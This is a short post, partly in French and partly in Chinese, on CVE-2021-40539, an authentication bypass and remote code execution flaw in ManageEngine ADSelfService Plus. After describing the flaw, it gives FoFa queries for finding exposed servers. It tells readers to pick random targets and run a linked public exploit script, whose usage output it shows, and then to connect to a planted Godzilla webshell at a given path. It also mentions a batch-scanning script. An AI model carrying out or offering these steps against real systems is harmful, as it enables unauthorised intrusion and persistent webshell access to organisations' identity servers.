
CVE-2021-40539:ADSelfService Plus RCE漏洞
CVE-2021-40539 : Vulnérabilité RCE dans ADSelfService Plus 一:Description de la vulnérabilité ZOHO ManageEngine ADSelfService Plus est la solution intégrée de gestion de mots de passe en libre-service et d'authentification unique de la société ZOHO pour Active Directory et les applications cloud. CVE-2021-40539 Zoho ManageEngine ADSelfService Plus versions 6113 et antérieures présentent une vulnérabilité de contournement de l'authentification de l'API REST, permettant à un attaquant distant de contrôler le système affecté. Score CVSS : 9,33, niveau de gravité : critique.
二:Exploitation de la vulnérabilité Étape 1 : Requête FoFa
# Fofa搜索语法
"ADSelfService"
app="ZOHO-ManageEngine-ADSelfService"
header="JSESSIONIDADSSP" //推荐
Étape 2 : Cibler aléatoirement et utiliser le script de détection suivant pour tester la vulnérabilité....
https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py
使用方式:
C:\Users\26629\Desktop\CVE-2021-40539-main>python39 exploit.py
usage: exploit.py [-h] -t TARGET [-w WEBSHELL] [-j JAVA_CLASS] [-s]
exploit.py: error: the following arguments are required: -t/--target
Étape 3 : Utiliser Godzilla (webshell) pour se connecter et effectuer une vérification.... https://ip/help/admin-guide/test.jsp
J'ai téléchargé un script de test par lot. Vous pouvez le télécharger pour l'améliorer.